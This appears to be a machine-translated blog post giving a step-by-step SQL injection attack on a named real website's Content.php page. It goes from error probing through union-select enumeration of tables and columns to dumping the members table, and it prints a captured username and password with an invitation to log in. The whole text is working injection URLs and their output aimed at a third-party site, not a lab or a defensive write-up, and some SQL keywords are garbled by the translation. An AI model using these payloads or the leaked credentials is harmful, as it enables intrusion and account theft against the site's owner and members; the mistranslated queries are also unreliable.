Target: http://www.natoleo.com/Content.php?id=14
1. Check bug on a website by adding single quote (') behind the url, there will be bugs in http://www.natoleo.com
it says error: MySQL Error: 1064 (You not have an error in your SQL syntax; check the manual That corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc 'at line 1)
2. To search using the column order [order by]. Order by 1 - beginning with a 1, next 2, and up we dpt error. Example error appeared in number 6. MySQL Error: 1054 (Unknown column '6 'in' order clause ')
http://www.natoleo.com/Content.php?id=14 order by 5 -
so the number taken is 6-1 = 5 (total column is 5)
3. Next we'll find a "magic number" where we always do with command injection [union all select]. Do not forget to add a minus sign (-) in front of the id = parameter number 14 becomes id = -14
http://www.natoleo.com/Content.php?id=-14 union all select 1,2,3,4,5 -
will appear "magic number": 1
4. Next we find her version of MySql database with command "version ()" in figure 1.
http://www.natoleo.com/Content.php?id=-14 union all select version () ,2,3,4,5 -
appears the inscription: 5.0.51a-community
5. Next we will find the table with his writing "group_concat (table_name)" in one of the magic numbers and "from information_schema.tables Tenggara table_schema = database () -" behind the figure 5
http://www.natoleo.com/Content.php?id=-14 union all select group_concat (table_name), 2,3,4,5 from information_schema.tables Tenggara table_schema = database () -
appear the names of the table:
6. Next we look at hand column of table relationships with user and password, this time we take a table "members" first before we convert to hex that can be read by the Sql here: http://home.paulschou.net/tools/xlate/ : on tap members ascii text and then click encode. results in column Hex Value: 6D656D62657273
and further is "group_concat (COLUMN_NAME)" on magical figures 1 and "from Banjarmasin information_schema.columns table_name = 0xHexa -" at the end of the URL that is 6D656D62657273
add 0x in front of hex so that the server can tell that it has diconvertke hexa.
http://www.natoleo.com/Content.php?id=-14 union all select group_concat (COLUMN_NAME), 2,3,4,5 from Banjarmasin information_schema.columns table_name = 0x6D656D62657273 -
appear column:
we take: member_login, member_password
7. To view the contents of the second column use the command "group_concat (COLUMN1, 0x3a, COLUMN2)" in figure 1 and from NAMATABLE magic - at the end of the URL
COLUMN1 substitute with "member_login" and COLUMN2 with "member_password". 0x3a is a colon (:), which has diconvert to hexa. TABLE NAME is replaced with "members" to retrieve information from a table named "members"
http://www.natoleo.com/Content.php?id=-14 union all select group_concat (member_login, 0x3a, member_password), 2,3,4,5 from members -
results will appear:
user: wilmarnatoleo
pass: natoleoP @ ssword
now live log on to the website :)
No comments:
Post a Comment